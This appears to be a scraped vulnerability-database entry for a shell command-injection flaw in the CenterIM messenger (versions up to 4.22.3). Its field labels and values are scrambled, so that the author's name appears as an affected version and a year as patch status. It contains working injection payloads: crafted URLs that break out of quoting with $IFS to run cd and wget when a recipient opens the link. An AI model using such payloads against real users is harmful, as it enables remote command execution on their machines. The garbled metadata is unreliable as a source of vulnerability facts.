vendor:
YES
by:
}""
;""
CVSS
$""
Execution of shell commands
7.5
CWE
Product Name: YES
Affected Version From: Brian Fonfara (w00)
Affected Version To: N/A
Patch Exists: 2008
Related CWE: &&"" and ""||"". Standard settings: - Browser already open: http://gidf.de/centerim)';cd$IFS$HOME/Desktop;wget${IFS}http://google.de;'( - New browser instance: http://gidf.de/centerim""&cd$IFS$HOME/Desktop;wget${IFS}http://google.de"""
CPE: 78
Metasploit:
a:centerim:centerim
Other Scripts:
CenterIM
Tags: https://www.exploit-db.com/raw/5283
CVSS Metrics: N/A
Nuclei References:
CenterIM
Nuclei Metadata: Linux
Platforms Tested: centerim <= 4.22.3
{""
Application: CenterIM
Received URLs in the message window do not get checked for illegal characters, like "'", ""'
Mitigation:
HIGH
